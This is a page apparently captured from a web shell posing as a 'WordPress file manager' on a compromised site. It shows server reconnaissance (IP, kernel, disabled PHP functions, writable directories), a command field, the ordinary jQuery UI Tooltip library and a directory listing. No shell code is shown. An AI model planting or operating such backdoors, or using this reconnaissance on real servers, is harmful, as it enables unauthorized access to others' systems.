GRAYBYTE WORDPRESS FILE MANAGER6847

Server IP : 149.255.58.128 / Your IP : 216.73.216.40
System : Linux cloud516.thundercloud.uk 5.14.0-427.26.1.el9_4.x86_64 #1 SMP PREEMPT_DYNAMIC Wed Jul 17 15:51:13 EDT 2024 x86_64
PHP Version : 8.2.28
Disable Function : allow_url_include, apache_child_terminate, apache_setenv, exec, passthru, pcntl_exec, posix_kill, posix_mkfifo, posix_getpwuid, posix_setpgid, posix_setsid, posix_setuid, posix_setgid, posix_seteuid, posix_setegid, posix_uname, proc_close, proc_get_status, proc_open, proc_terminate, shell_exec, show_source, system
cURL : ON | WGET : ON | Sudo : OFF | Pkexec : OFF
Directory : /home/wheelch2/public_html/wp-includes/js/jquery/ui/
Upload Files :
Current_dir [ Writeable ] Document_root [ Writeable ]

Command :


Current File : /home/wheelch2/public_html/wp-includes/js/jquery/ui//tooltip.min.js
/*!
 * jQuery UI Tooltip 1.13.2
 * http://jqueryui.com
 *
 * Copyright jQuery Foundation and other contributors
 * Released under the MIT license.
 * http://jquery.org/license
 */
!function(t){"use strict";"function"==typeof define&&define.amd?define(["jquery","./core"],t):t(jQuery)}(function(r){"use strict";return r.widget("ui.tooltip",{version:"1.13.2",options:{classes:{"ui-tooltip":"ui-corner-all ui-widget-shadow"},content:function(){var t=r(this).attr("title");return r("<a>").text(t).html()},hide:!0,items:"[title]:not([disabled])",position:{my:"left top+15",at:"left bottom",collision:"flipfit flip"},show:!0,track:!1,close:null,open:null},_addDescribedBy:function(t,i){var e=(t.attr("aria-describedby")||"").split(/\s+/);e.push(i),t.data("ui-tooltip-id",i).attr("aria-describedby",String.prototype.trim.call(e.join(" ")))},_removeDescribedBy:function(t){var i=t.data("ui-tooltip-id"),e=(t.attr("aria-describedby")||"").split(/\s+/),i=r.inArray(i,e);-1!==i&&e.splice(i,1),t.removeData("ui-tooltip-id"),(e=String.prototype.trim.call(e.join(" ")))?t.attr("aria-describedby",e):t.removeAttr("aria-describedby")},_create:function(){this._on({mouseover:"open",focusin:"open"}),this.tooltips={},this.parents={},this.liveRegion=r("<div>").attr({role:"log","aria-live":"assertive","aria-relevant":"additions"}).appendTo(this.document[0].body),this._addClass(this.liveRegion,null,"ui-helper-hidden-accessible"),this.disabledTitles=r([])},_setOption:function(t,i){var e=this;this._super(t,i),"content"===t&&r.each(this.tooltips,function(t,i){e._updateContent(i.element)})},_setOptionDisabled:function(t){this[t?"_disable":"_enable"]()},_disable:function(){var o=this;r.each(this.tooltips,function(t,i){var e=r.Event("blur");e.target=e.currentTarget=i.element[0],o.close(e,!0)}),this.disabledTitles=this.disabledTitles.add(this.element.find(this.options.items).addBack().filter(function(){var t=r(this);if(t.is("[title]"))return t.data("ui-tooltip-title",t.attr("title")).removeAttr("title")}))},_enable:function(){this.disabledTitles.each(function(){var t=r(this);t.data("ui-tooltip-title")&&t.attr("title",t.data("ui-tooltip-title"))}),this.disabledTitles=r([])},open:function(t){var e=this,i=r(t?t.target:this.element).closest(this.options.items);i.length&&!i.data("ui-tooltip-id")&&(i.attr("title")&&i.data("ui-tooltip-title",i.attr("title")),i.data("ui-tooltip-open",!0),t&&"mouseover"===t.type&&i.parents().each(function(){var t,i=r(this);i.data("ui-tooltip-open")&&((t=r.Event("blur")).target=t.currentTarget=this,e.close(t,!0)),i.attr("title")&&(i.uniqueId(),e.parents[this.id]={element:this,title:i.attr("title")},i.attr("title",""))}),this._registerCloseHandlers(t,i),this._updateContent(i,t))},_updateContent:function(i,e){var t=this.options.content,o=this,n=e?e.type:null;if("string"==typeof t||t.nodeType||t.jquery)return this._open(e,i,t);(t=t.call(i[0],function(t){o._delay(function(){i.data("ui-tooltip-open")&&(e&&(e.type=n),this._open(e,i,t))})}))&&this._open(e,i,t)},_open:function(t,i,e){var o,n,s,l=r.extend({},this.options.position);function a(t){l.of=t,o.is(":hidden")||o.position(l)}e&&((s=this._find(i))?s.tooltip.find(".ui-tooltip-content").html(e):(i.is("[title]")&&(t&&"mouseover"===t.type?i.attr("title",""):i.removeAttr("title")),s=this._tooltip(i),o=s.tooltip,this._addDescribedBy(i,o.attr("id")),o.find(".ui-tooltip-content").html(e),this.liveRegion.children().hide(),(s=r("<div>").html(o.find(".ui-tooltip-content").html())).removeAttr("name").find("[name]").removeAttr("name"),s.removeAttr("id").find("[id]").removeAttr("id"),s.appendTo(this.liveRegion),this.options.track&&t&&/^mouse/.test(t.type)?(this._on(this.document,{mousemove:a}),a(t)):o.position(r.extend({of:i},this.options.position)),o.hide(),this._show(o,this.options.show),this.options.track&&this.options.show&&this.options.show.delay&&(n=this.delayedShow=setInterval(function(){o.is(":visible")&&(a(l.of),clearInterval(n))},13)),this._trigger("open",t,{tooltip:o})))},_registerCloseHandlers:function(t,i){var e={keyup:function(t){t.keyCode===r.ui.keyCode.ESCAPE&&((t=r.Event(t)).currentTarget=i[0],this.close(t,!0))}};i[0]!==this.element[0]&&(e.remove=function(){var t=this._find(i);t&&this._removeTooltip(t.tooltip)}),t&&"mouseover"!==t.type||(e.mouseleave="close"),t&&"focusin"!==t.type||(e.focusout="close"),this._on(!0,i,e)},close:function(t){var i,e=this,o=r(t?t.currentTarget:this.element),n=this._find(o);n?(i=n.tooltip,n.closing||(clearInterval(this.delayedShow),o.data("ui-tooltip-title")&&!o.attr("title")&&o.attr("title",o.data("ui-tooltip-title")),this._removeDescribedBy(o),n.hiding=!0,i.stop(!0),this._hide(i,this.options.hide,function(){e._removeTooltip(r(this))}),o.removeData("ui-tooltip-open"),this._off(o,"mouseleave focusout keyup"),o[0]!==this.element[0]&&this._off(o,"remove"),this._off(this.document,"mousemove"),t&&"mouseleave"===t.type&&r.each(this.parents,function(t,i){r(i.element).attr("title",i.title),delete e.parents[t]}),n.closing=!0,this._trigger("close",t,{tooltip:i}),n.hiding)||(n.closing=!1)):o.removeData("ui-tooltip-open")},_tooltip:function(t){var i=r("<div>").attr("role","tooltip"),e=r("<div>").appendTo(i),o=i.uniqueId().attr("id");return this._addClass(e,"ui-tooltip-content"),this._addClass(i,"ui-tooltip","ui-widget ui-widget-content"),i.appendTo(this._appendTo(t)),this.tooltips[o]={element:t,tooltip:i}},_find:function(t){t=t.data("ui-tooltip-id");return t?this.tooltips[t]:null},_removeTooltip:function(t){clearInterval(this.delayedShow),t.remove(),delete this.tooltips[t.attr("id")]},_appendTo:function(t){t=t.closest(".ui-front, dialog");return t=t.length?t:this.document[0].body},_destroy:function(){var o=this;r.each(this.tooltips,function(t,i){var e=r.Event("blur"),i=i.element;e.target=e.currentTarget=i[0],o.close(e,!0),r("#"+t).remove(),i.data("ui-tooltip-title")&&(i.attr("title")||i.attr("title",i.data("ui-tooltip-title")),i.removeData("ui-tooltip-title"))}),this.liveRegion.remove()}}),!1!==r.uiBackCompat&&r.widget("ui.tooltip",r.ui.tooltip,{options:{tooltipClass:null},_tooltip:function(){var t=this._superApply(arguments);return this.options.tooltipClass&&t.tooltip.addClass(this.options.tooltipClass),t}}),r.ui.tooltip});

[ Back ]
Name
Size
Last Modified
Owner / Group
Permissions
Options
..
--
May 29 2023 22:38:18
1032 / wheelch2
0755
accordion.js
15.701 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
accordion.min.js
8.607 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
autocomplete.js
17.033 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
autocomplete.min.js
8.268 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
button.js
11.408 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
button.min.js
5.992 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
checkboxradio.js
7.363 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
checkboxradio.min.js
4.208 KB
September 24 2022 00:25:30
1032 / wheelch2
0644
controlgroup.js
8.41 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
controlgroup.min.js
4.287 KB
September 24 2022 00:25:30
1032 / wheelch2
0644
core.js
48.681 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
core.min.js
20.936 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
datepicker.js
80.563 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
datepicker.min.js
35.868 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
dialog.js
23.026 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
dialog.min.js
12.653 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
draggable.js
34.59 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
draggable.min.js
17.892 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
droppable.js
12.573 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
droppable.min.js
6.491 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
effect-blind.js
1.584 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-blind.min.js
0.844 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-bounce.js
2.576 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-bounce.min.js
0.952 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-clip.js
1.519 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-clip.min.js
0.762 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-drop.js
1.536 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-drop.min.js
0.72 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-explode.js
2.834 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-explode.min.js
1.08 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-fade.js
0.924 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-fade.min.js
0.497 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-fold.js
2.112 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-fold.min.js
0.98 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-highlight.js
1.192 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-highlight.min.js
0.617 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-puff.js
0.95 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-puff.min.js
0.482 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-pulsate.js
1.509 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-pulsate.min.js
0.656 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-scale.js
1.319 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-scale.min.js
0.69 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-shake.js
1.818 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-shake.min.js
0.811 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-size.js
5.27 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-size.min.js
2.417 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-slide.js
1.899 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-slide.min.js
0.88 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-transfer.js
0.846 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect-transfer.min.js
0.416 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect.js
40.962 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
effect.min.js
16.928 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
menu.js
18.411 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
menu.min.js
9.877 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
mouse.js
6.047 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
mouse.min.js
3.322 KB
September 24 2022 00:25:30
1032 / wheelch2
0644
progressbar.js
4.116 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
progressbar.min.js
2.48 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
resizable.js
29.621 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
resizable.min.js
18.267 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
selectable.js
7.915 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
selectable.min.js
4.383 KB
September 24 2022 00:25:30
1032 / wheelch2
0644
selectmenu.js
15.755 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
selectmenu.min.js
9.128 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
slider.js
19.1 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
slider.min.js
10.477 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
sortable.js
46.453 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
sortable.min.js
24.853 KB
February 02 2023 22:06:32
1032 / wheelch2
0644
spinner.js
14.027 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
spinner.min.js
7.441 KB
September 24 2022 00:25:30
1032 / wheelch2
0644
tabs.js
23.021 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
tabs.min.js
11.657 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
tooltip.js
14.061 KB
September 19 2022 22:34:10
1032 / wheelch2
0644
tooltip.min.js
6.039 KB
February 02 2023 22:06:32
1032 / wheelch2
0644

GRAYBYTE WORDPRESS FILE MANAGER @ 2025
CONTACT ME
Static GIF